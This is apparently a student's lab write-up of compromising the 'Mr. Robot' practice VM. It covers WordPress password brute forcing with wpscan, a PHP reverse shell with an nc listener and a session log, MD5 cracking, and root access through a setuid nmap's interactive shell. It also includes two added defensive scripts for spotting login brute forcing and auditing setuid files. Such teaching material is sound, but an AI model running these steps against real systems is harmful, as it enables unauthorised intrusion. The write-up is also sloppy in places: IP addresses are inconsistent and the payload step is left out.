Report On VM 2 Ip:-144.244.143.144 Name:sathya Sachi Paira: Nmap - P - A 143.244.143.144


Report on vm 2

Ip:-144.244.143.144
name:sathya sachi paira
email:[email protected]

Penetrating Methodology:

•Recon (Nikto)
•Use robots.txt
•Grab 1st key
•Download fsocity.dic file and use a dictionary
•WordPress password cracking (wpscan)
•Login into WordPress
•Generate PHP Backdoor (Msfvenom)
•Upload and execute a backdoor
•Reverse connection (Metasploit)
•Get MD5 hash and crack it
•Import python one-liner for proper TTY shell
•Find / perm u=s for Privilege Escalation
•Get Root access and capture the flag.

To scan our target IP we will use an aggressive scan (-A):


nmap -p- -A 143.244.143.144
The scan result shows that the open ports are 22, 80, and 443. As port 80 is open, we can try to
open this IP in our browser.

Using Wappalyzer, we see that the CMS running is WordPress.

From robots.txt we get these two entries:-


fsociety.txt
key-1-of-3.txt

Now we have to download the files to our PC:


command:- wget http://143.244.143.144/fsociety.dic
command:- wget http://143.244.143.144/key-1-of-3.txt
flag1:- 073403c8a58a1f80d94355fb30724b9
command to view the text:- nano key-1-of-3.txt

Now we have to sort the wordlist and remove duplicate entries:

command:- sort fsociety.dic | uniq > fsociety_filter.dic

Now we open the WordPress login page in the browser:

URL:- 143.244.143.144/wp-login.php
Now we have to run wpscan:
command:- wpscan -u http://143.244.143.144/ --username Elliot --wordlist /root/Desktop/fsocity.dic
Now we find the password for Elliot.
Voilà, I get the password.
password is:- ER28-0652
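
From the defender's side, the wpscan password run above leaves a clear trace in the web server's access log. The following is an added example, not part of the original report: it assumes the Apache/nginx "combined" log format and WordPress's default behaviour of answering a failed login with 200 and a successful one with a 302 redirect; the log lines, IP addresses and function names are constructed.

```shell
#!/bin/sh
# Added example: spot password guessing against wp-login.php in an access log.

# Constructed sample log: one client guessing passwords, one normal user.
sample_log() {
cat <<'EOF'
198.51.100.7 - - [10/Mar/2024:08:11:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3512 "-" "constructed-scanner"
198.51.100.7 - - [10/Mar/2024:08:11:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3512 "-" "constructed-scanner"
198.51.100.7 - - [10/Mar/2024:08:11:02 +0000] "POST /wp-login.php HTTP/1.1" 200 3512 "-" "constructed-scanner"
198.51.100.7 - - [10/Mar/2024:08:11:02 +0000] "POST /wp-login.php HTTP/1.1" 200 3512 "-" "constructed-scanner"
198.51.100.7 - - [10/Mar/2024:08:11:03 +0000] "POST /wp-login.php HTTP/1.1" 200 3512 "-" "constructed-scanner"
198.51.100.7 - - [10/Mar/2024:08:11:03 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "constructed-scanner"
203.0.113.20 - - [10/Mar/2024:08:15:40 +0000] "GET /wp-login.php HTTP/1.1" 200 3512 "-" "Mozilla/5.0"
203.0.113.20 - - [10/Mar/2024:08:15:52 +0000] "POST /wp-login.php HTTP/1.1" 200 3512 "-" "Mozilla/5.0"
203.0.113.20 - - [10/Mar/2024:08:16:05 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
EOF
}

# detect_wp_bruteforce THRESHOLD   (reads the access log on stdin)
# Prints "ip failed=N success=M" for every client with at least THRESHOLD
# failed logins. success > 0 after many failures means a guess worked.
detect_wp_bruteforce() {
    awk -v min="$1" '
        # $6 = "METHOD, $7 = path, $9 = status in the combined log format
        $6 == "\"POST" && $7 ~ /^\/wp-login\.php/ {
            if ($9 == 200) failed[$1]++        # login form shown again
            else if ($9 == 302) ok[$1]++       # redirect into wp-admin
        }
        END {
            for (ip in failed)
                if (failed[ip] >= min)
                    printf "%s failed=%d success=%d\n", ip, failed[ip], ok[ip]
        }' | sort
}

# Run on the constructed sample with a threshold of 5 failed logins.
sample_log | detect_wp_bruteforce 5
```
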

Wow, now we are in PHP.

Once you have logged in, create the malicious file that you are going to upload to it. Generate the code
with the msfvenom command:

Now we have to use the pentestmonkey PHP reverse shell from GitHub.


The listener command is:- rlwrap nc -lvnp 4455
Now we have to do privilege escalation.

Now we have to crack the hash.


I use CrackStation: crackstation.net

Now the final part:


┌──(kali㉿kali)-[~/mrrobot]
└─$ rlwrap nc -lvnp 53
148 ⨯ 4 ⚙
listening on [any] 53 ...
connect to [192.168.1.28] from (UNKNOWN) [143.244.143.144] 57653
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
08:54:09 up 43 min, 0 users, load average: 0.00, 0.09, 0.17
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
ls
bin
boot
dev
etc
home
initrd.img
lib
lib64
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
vmlinuz
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
ls /root
ls: cannot open directory /root: Permission denied
pwd
/
ls /home
robot
cd robot
/bin/sh: 6: cd: can't cd to robot
ls /robot
ls: cannot access /robot: No such file or directory
cd /home/robot
ls
key-2-of-3.txt
password.raw-md5
cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission denied
ls -las
total 16
4 drwxr-xr-x 2 root root 4096 Nov 13 2015 .
4 drwxr-xr-x 3 root root 4096 Nov 13 2015 ..
4 -r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
4 -rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
su
su: must be run from a terminal
python -c ' import pty;pty.spawn("/bin/bash")'
File "<string>", line 1
import pty;pty.spawn("/bin/bash")
^
IndentationError: unexpected indent
python -c 'import pty;pty.spawn("/bin/bash")'
su robot
su robot
abcdefghijklmnopqrstuvwxyz

ls
ls
key-2-of-3.txt password.raw-md5
cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
nmap -interactive
nmap -interactive
Failed to open input file nteractive for reading
QUITTING!
find / -perm +6000 2>/dev/null | grep '/bin/'
find / -perm +6000 2>/dev/null | grep '/bin/'
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/mail-touchlock
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/screen
/usr/bin/mail-unlock
/usr/bin/mail-lock
/usr/bin/chsh
/usr/bin/crontab
/usr/bin/chfn
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/expiry
/usr/bin/dotlockfile
/usr/bin/sudo
/usr/bin/ssh-agent
/usr/bin/wall
/usr/local/bin/nmap
^[[200~/usr/local/bin/nmap
0~/usr/local/bin/nmap
bash: 0~/usr/local/bin/nmap: No such file or directory
/usr/local/bin/nmapn -interactive

/usr/local/bin/nmapn -interactive
bash: /usr/local/bin/nmapn: No such file or directory

robot@linux:~$
/usr/local/bin/nmapn --interactive

/usr/local/bin/nmapn --interactive
bash: /usr/local/bin/nmapn: No such file or directory

robot@linux:~$
/usr/local/bin/nmap --interactive

/usr/local/bin/nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )


Welcome to Interactive Mode -- press h <enter> for help
nmap> Bogus command -- press h <enter> for help
whoami
whoami
Unknown command (whoami) -- press h <enter> for help
!sh
!sh
whoami
whoami
root
ls
ls
key-2-of-3.txt password.raw-md5
pwd
pwd
/home/robot
cd /
cd /
ls
ls
bin dev home lib lost+found mnt proc run srv tmp var
boot etc initrd.img lib64 media opt root sbin sys usr vmlinuz
find key
find key
find: `key': No such file or directory
find -f key
find -f key
find: unknown predicate `-f'
cd /root
cd /root
ls
ls
firstboot_done key-3-of-3.txt
cat firstboot_done
cat firstboot_done
cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
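
The setuid nmap under /usr/local/bin is what gave root in the session above, and the same find search can be turned into a routine audit. The following is an added example, not part of the original report: it compares the setuid/setgid files under a directory against a baseline of expected paths; the function names, the baseline file and the temporary directory tree are constructed for the demonstration.

```shell
#!/bin/sh
# Added example: report setuid/setgid files that are not on an expected baseline.

# list_setid ROOT: print every regular file under ROOT that has the setuid or
# setgid bit. This is the portable form of the session's "-perm +6000"
# (current GNU find spells that "-perm /6000").
list_setid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# unexpected_setid ROOT BASELINE: print setid files not listed in BASELINE
# (one absolute path per line, compared as fixed whole-line strings).
unexpected_setid() {
    list_setid "$1" | grep -Fxv -f "$2" || true
}

# demo: build a constructed tree that mirrors the report's finding
# (su and passwd are expected, nmap under /usr/local/bin is not).
demo() {
    root=$(mktemp -d)
    mkdir -p "$root/bin" "$root/usr/bin" "$root/usr/local/bin"
    for f in bin/su usr/bin/passwd usr/bin/ls usr/local/bin/nmap; do
        : > "$root/$f"
    done
    chmod 4755 "$root/bin/su" "$root/usr/bin/passwd" "$root/usr/local/bin/nmap"
    chmod 0755 "$root/usr/bin/ls"
    printf '%s\n' "$root/bin/su" "$root/usr/bin/passwd" > "$root/baseline.txt"
    # Strip the temporary prefix so the result reads like a real path.
    unexpected_setid "$root" "$root/baseline.txt" | sed "s|^$root||"
    rm -rf "$root"
}

demo
```

On a real host, record the baseline from a known-good install (for example `list_setid / > baseline.txt`) and investigate every path the comparison reports.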
